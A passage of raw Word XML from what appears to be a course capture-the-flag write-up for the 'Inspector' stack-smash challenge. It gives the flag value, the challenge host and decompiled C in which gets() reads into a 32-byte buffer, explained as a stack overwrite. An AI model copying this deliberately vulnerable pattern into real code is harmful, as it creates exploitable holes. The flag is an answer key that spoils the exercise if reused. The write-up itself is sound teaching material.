          </w:pPr>
          <w:hyperlink w:anchor="_Toc161243444" w:history="1">
            <w:r w:rsidRPr="00843D31">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix D: Inspector_Pwn.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc161243444 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0070558B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C22F9BB" w14:textId="1D8326FF" w:rsidR="00AF0191" w:rsidRDefault="00AF0191">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161243445" w:history="1">
            <w:r w:rsidRPr="00843D31">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix E: RPP_Pwn.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc161243445 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0070558B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6978DAFB" w14:textId="44D36016" w:rsidR="00FD4229" w:rsidRPr="005264D0" w:rsidRDefault="00087743">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="005264D0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="084E113C" w14:textId="00130FE9" w:rsidR="00B00365" w:rsidRPr="005264D0" w:rsidRDefault="00087743">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1481AB" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB3E752" w14:textId="1FD847D6" w:rsidR="00646037" w:rsidRDefault="0052786E" w:rsidP="00646037">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc161243432"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Challenge</w:t>
      </w:r>
      <w:r w:rsidR="00646037">
        <w:t xml:space="preserve"> Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="4145DD48" w14:textId="72D2512A" w:rsidR="00E676B6" w:rsidRPr="001215EC" w:rsidRDefault="00BF2F28" w:rsidP="00E676B6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Inspector"/>
      <w:bookmarkStart w:id="3" w:name="_Toc161243433"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t>Inspector</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="3046F93F" w14:textId="77777777" w:rsidR="00E676B6" w:rsidRPr="00530A29" w:rsidRDefault="00E676B6" w:rsidP="00E676B6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc161243434"/>
      <w:r w:rsidRPr="000F56D3">
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1461"/>
        <w:gridCol w:w="1234"/>
        <w:gridCol w:w="6655"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E676B6" w:rsidRPr="005264D0" w14:paraId="55B7F525" w14:textId="77777777" w:rsidTr="00DF5A5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2DD4BF34" w14:textId="14E814F4" w:rsidR="00E676B6" w:rsidRPr="005264D0" w:rsidRDefault="00BF2F28" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Inspector</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E676B6" w:rsidRPr="005264D0" w14:paraId="17BE37DC"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0D4482AF" w14:textId="448F033B" w:rsidR="00E676B6" w:rsidRPr="00DA733E" w:rsidRDefault="00E676B6" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00BF2F28">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>0 Points</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="185618D1" w14:textId="77777777" w:rsidR="00E676B6" w:rsidRPr="00EE0A5C" w:rsidRDefault="00E676B6" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Flag Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3A02C7F8" w14:textId="32A64FF5" w:rsidR="00E676B6" w:rsidRPr="005264D0" w:rsidRDefault="00BF2F28" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF2F28">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>flag{inspect0r_gadg3t}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E676B6" w:rsidRPr="005264D0" w14:paraId="5854AB0A"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7771A053" w14:textId="77777777" w:rsidR="00E676B6" w:rsidRPr="005264D0" w:rsidRDefault="00E676B6" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="5D209333" w14:textId="77777777" w:rsidR="00E676B6" w:rsidRPr="00EE0A5C" w:rsidRDefault="00E676B6" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="45BBFFE4" w14:textId="4FF9BD3F" w:rsidR="00E676B6" w:rsidRPr="005264D0" w:rsidRDefault="00BF2F28" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF2F28">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>offsec-chalbroker.osiris.cyber.nyu.edu 1342</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E676B6" w:rsidRPr="005264D0" w14:paraId="4A0CD9E9"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433276F9" w14:textId="77777777" w:rsidR="00E676B6" w:rsidRPr="005264D0" w:rsidRDefault="00E676B6" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="020B0E38" w14:textId="77777777" w:rsidR="00E676B6" w:rsidRPr="00EE0A5C" w:rsidRDefault="00E676B6" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Lore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7D2D3310" w14:textId="2EC033B7" w:rsidR="00E676B6" w:rsidRDefault="00BF2F28" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Inspector Gadget</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E676B6" w:rsidRPr="005264D0" w14:paraId="28586253"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6A109C2E" w14:textId="77777777" w:rsidR="00E676B6" w:rsidRPr="005264D0" w:rsidRDefault="00E676B6" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="1A447711" w14:textId="77777777" w:rsidR="00E676B6" w:rsidRPr="00EE0A5C" w:rsidRDefault="00E676B6" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Filename</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="4F987F4C" w14:textId="098D4DA5" w:rsidR="00E676B6" w:rsidRDefault="00BF2F28" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>inspector</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61C0CA37" w14:textId="49C582AF" w:rsidR="00BF2F28" w:rsidRDefault="00E676B6" w:rsidP="00E676B6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc161243435"/>
      <w:r w:rsidRPr="00840BBB">
        <w:t>Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="263D0F74" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">On the first run, </w:t>
      </w:r>
      <w:r w:rsidRPr="00847435">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>inspector</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> asked the user to pop a shell, then exited after receiving a greeting instead of a payload.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6385"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="12EB272E" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6385" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="776E9077" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>┌──(kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>㉿</w:t>
            </w:r>
            <w:r>
              <w:t>kali)-[~/Desktop/6-Week]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67A91805" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">└─$ ./inspector </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D0B5C25" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>I'm not even pretending this isn't a stack-smash anymore. Please pop a shell!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="209BC542" w14:textId="17DAD99A" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Hello</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B31B499" w14:textId="6803B0D6" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>First Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378D0310" w14:textId="2CBA1E86" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">The program </w:t>
      </w:r>
      <w:r w:rsidRPr="00847435">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> method is straightforward; </w:t>
      </w:r>
      <w:r w:rsidRPr="00847435">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>inspector</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> prints a message to </w:t>
      </w:r>
      <w:r w:rsidRPr="00847435">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>stdout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidRPr="00847435">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>puts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and then receives user-input data using </w:t>
      </w:r>
      <w:r w:rsidRPr="00847435">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00847435">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function will allow an attacker to overwrite the stack by inputting data larger than the allotted buffer.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="6352262E" w14:textId="77777777" w:rsidTr="00847435">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10620" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="4B3AC45D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>undefined8 main(EVP_PKEY_CTX *param_1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="288BF143" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CFB8F8A" w14:textId="12BA9331" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  char data [32];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69BE7E44" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  init(param_1);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BFEEE70" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  puts("I\'m not even pretending this isn\'t a stack-smash anymore. Please pop a shell!");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E0E2292" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  gets(data);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F50F362" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  return 0;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="289B27CA" w14:textId="6F95E737" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="295D79F6" w14:textId="091B7C97" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Main Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27010CF9" w14:textId="4FFE499F" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00847435">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>inspector main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> method code is similar to that of the </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Backdoor_1" w:history="1">
        <w:r w:rsidRPr="00B648B1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Backdoor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink w:anchor="_School" w:history="1">
        <w:r w:rsidRPr="00B648B1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>School</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> challenges from Pwn Two, which are available in </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Appendix_C:_Backdoor" w:history="1">
        <w:r w:rsidR="00B648B1" w:rsidRPr="00B648B1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Appendix C</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> for reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5B7E20" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t>The program has five pre-built gadget "functions," but this writeup does not use them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C872D7" w14:textId="77777777" w:rsidR="00B648B1" w:rsidRDefault="00B648B1" w:rsidP="00847435"/>
    <w:p w14:paraId="3F50641D" w14:textId="246AA9FE" w:rsidR="00B648B1" w:rsidRDefault="00E222D3" w:rsidP="00E222D3">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2B083ABC" wp14:editId="6C0EBC24">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1971675</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1819275</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1114425" cy="914400"/>
                <wp:effectExtent l="0" t="0" r="28575" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="692037394" name="Rectangle 2"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1114425" cy="914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0E8E8" id="Rectangle 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:155.25pt;margin-top:143.25pt;width:87.7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" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B648B1" w:rsidRPr="00B648B1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B648B1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6238FD0A" wp14:editId="183CAE6C">
            <wp:extent cx="2247900" cy="3267075"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
            <wp:docPr id="10524108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1086" name="Picture 1" descr="A close-up of a compute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267075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
